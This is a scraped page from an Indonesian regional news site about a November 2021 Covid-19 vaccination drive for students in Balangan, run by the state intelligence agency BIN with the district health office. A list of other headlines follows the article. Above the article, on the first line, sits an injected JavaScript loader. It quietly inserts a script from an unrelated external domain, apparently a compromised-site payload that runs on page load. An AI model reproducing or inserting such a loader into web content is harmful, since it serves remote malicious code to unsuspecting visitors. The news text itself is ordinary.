(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Dukung Pelaksanaan PTM, BIN Kalsel Gelar Vaksinasi Pelajar di Balangan


KANALKALIMANTAN.COM, PARINGIN – Guna meminimalisir penyebaran Covid-19 serta mendukung proses Pembelajaran Tatap Muka (PTM) di sekolah, Badan Intelijen Negara Republik Indonesia (BIN) mengelar vaksinasi massal bagi pelajar.

Pelaksanaan vaksinasi massal ini sendiri, berlangsung sejak 15 hingga 18 November mendatang yang akan dibuka pada beberapa tempat di wilayah Balangan.

Rangkaian pelaksanaan vaksinasi massal ini sendiri, pertama kali digelar di SMAN 1 Paringin, Senin (15/11/2021). Selain diikuti oleh para pelajar juga diikuti masyarakat umum.

Selain di SMAN 1 Paringin, tanggal 16 November juga dijadwalkan di Ponpes Nurul Muhibbin, SMKN 1 Paringin, dan SMPN 2 Paringin.

 

Baca juga : Bupati Banjar H Saidi Mansyur Minta Penghargaan Adiwiyata Bukan Hanya Simbol

Kemudian berlanjut 16 November yang dibuka di Puskesmas Lampihong. Sedangkan pada hari terakhir, tanggal 18 November, gerai vaksin dibuka di SMKN 1 Batumandi dan MTsN 1 Balangan.

Pelaksanaan vaksin yang digencarkan oleh BIN dengan bekerja sama Dinkes Kabupaten Balangan ini ditargetkan menyasar seribu peserta vaksin.

Kepala Bagian Operasi (Kabag Ops) BIN Kalsel Supriyono mengatakan, vaksinasi yang digelar bertujuan untuk meningkatkan herd immunity masyarakat. Adapun sasarannya mulai dari pelajar hingga masyarakat umum dan para lansia.

Sebut Supriyono, BIN juga mengutamakan vaksin pada wilayah yang capaian vaksinasinya masih rendah. Sehingga diharapkan dapat membantu meningkatkan capaian vaksin di Balangan.

“Vaksinasi massal ini juga menindaklanjuti arahan Presiden RI Joko Widodo dan Kepala BIN Jend (Purn) Budi Gunawan untuk mempercepat program vaksinasi agar tercapainya herd immunity secara nasional,” pungkasnya. (Kanalkalimantan.com/kk)

Reporter : kk
Editor : cell


Desy Arfianty

Recent Posts

Rekomendasi Partai Tak Pasti, Jaya-Abdi Siap Jadi Penantang Petahana Aditya-Yuti

Jaya : Penantang Bisa Lebih dalam Mengevaluasi Kinerja Petahana Read More

20 menit ago

Lima Jabatan di Polres Banjarbaru Rotasi, 12 Personel Terima Penghargaan Kapolda

KANALKALIMANTAN.COM, BANJARBARU - Lima jabatan yang diisi para perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

2 jam ago

Nurgita Tiyas Berharap Guru Dapat Lebih Cakap Digital

KANALKALIMANTAN.COM, BANJARMASIN - Ketua TP PKK Kabupaten Banjar Hj Nurgita Tiyas menghadiri Talkshow Literasi Digital… Read More

2 jam ago

Srikandi PLN UPT Palangkaraya Mengajar di SDN 5 Bukit Tunggal

KANALKALIMANTAN.COM, PALANGKARAYA – PT PLN (Persero) Unit Pelaksana Transmisi (UPT) Palangkaraya melalui gugus tugas Srikandi… Read More

5 jam ago

Pemkab HSU Gelar Peringatan Harkitnas

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan memimpin upacara peringatan… Read More

5 jam ago

‘Memakan’ Jalan, Lapak Pedagang Pasar Lama Diminta Mundur

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah pedagang yang berjualan di Pasar Lama Banjarmasin tepatnya di Jalan Pasar… Read More

5 jam ago

This website uses cookies.